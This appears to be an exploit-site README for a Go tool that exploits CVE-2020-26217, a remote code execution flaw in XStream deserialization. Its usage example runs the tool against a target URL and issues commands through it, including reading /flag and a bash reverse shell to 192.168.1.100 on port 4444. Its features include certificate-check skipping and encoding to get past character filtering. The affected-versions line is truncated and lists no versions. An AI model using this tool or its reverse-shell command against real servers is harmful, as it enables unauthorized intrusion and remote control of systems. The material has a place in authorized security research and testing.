## https://sploitus.com/exploit?id=BEDAC9E1-351C-59AB-9277-ECECAB6F3F58
# CVE-2020-26217 XStream RCE Exploit
XStream remote code execution vulnerability exploit. ## Vulnerability Description
CVE-2020-26217 is a deserialization vulnerability in the XStream library. Attackers can trigger remote code execution by constructing malicious XML data. Affected versions: XStream
## Example
```
# Run the tool
go run poc.go http://target.com:8080/?data
# Enter commands in interactive mode
cmd> whoami
cmd> cat /flag
cmd> bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
cmd> exit
```
## Features
- Interactive command execution
- Automatic URL parameter name parsing
-Base64 encoding with special character filtering
- Supports HTTPS (skipping certificate verification)
## Compilation
```
bash
go build -o poc poc.go
```
## Disclaimer
This tool is intended only for security research and authorized testing purposes. Do not use it for illegal purposes. Users must bear all related legal responsibilities.